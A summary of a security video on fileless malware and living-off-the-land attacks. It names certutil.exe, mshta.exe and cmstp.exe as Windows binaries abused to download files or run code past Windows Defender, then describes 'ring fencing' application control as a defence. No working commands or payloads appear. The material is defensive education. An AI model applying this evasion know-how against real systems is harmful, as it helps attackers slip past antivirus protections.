New Video from @collinsinfosec Explores Fileless Malware and Living Off the Land Techniques

In this video, CollinsInfosec explores the concept of "fileless malware" and the "living off the land" (LOL) techniques used by attackers to avoid detection by antivirus software like Windows Defender. "Fileless malware" is defined in two ways: firstly, as malicious code that operates directly in the computer's memory rather than on the hard drive, and secondly, as malicious activities using native tools of the operating system. The video focuses on the second definition, highlighting the use of native binaries to carry out attacks without leaving obvious traces. The video's author demonstrates the use of three commonly deployed LOL binaries in cyber attack chains: certutil.exe, mshta.exe, and cmstp.exe. Certutil.exe is used to manage Windows SSL/TLS certificates and can be exploited to download malicious files. Mshta.exe, a utility for creating standalone HTML applications, allows the execution of arbitrary code by bypassing browser defenses. Finally, cmstp.exe, a command-line program for installing connection manager service profiles, can be used to execute malicious commands remotely. To illustrate these techniques, the author uses a simple Python application that triggers these three LOL binaries. He shows how these commands can be executed even with Windows Defender enabled, highlighting the ineffectiveness of certain antivirus software against these attack methods. He then introduces the concept of "ring fencing" as a potential solution. "Ring fencing" involves restricting the capabilities and access of legitimate applications to prevent malicious behaviors. For example, an application like QuickBooks would not need to access PowerShell or create remote desktop profiles, so these actions can be blocked. The author demonstrates the application of this technique using an application control policy that restricts access of certain applications to specific executables. By applying these policies, he shows how a simulated malicious application is blocked, thus preventing the execution of dangerous commands. This approach allows the continued use of legitimate software while significantly reducing the risk of attacks. In conclusion, the video provides an in-depth exploration of "fileless malware" and LOL binary techniques, as well as a practical solution with "ring fencing" to enhance system security. It shows how these concepts can be applied in real-world scenarios to strengthen defenses against cyber attacks.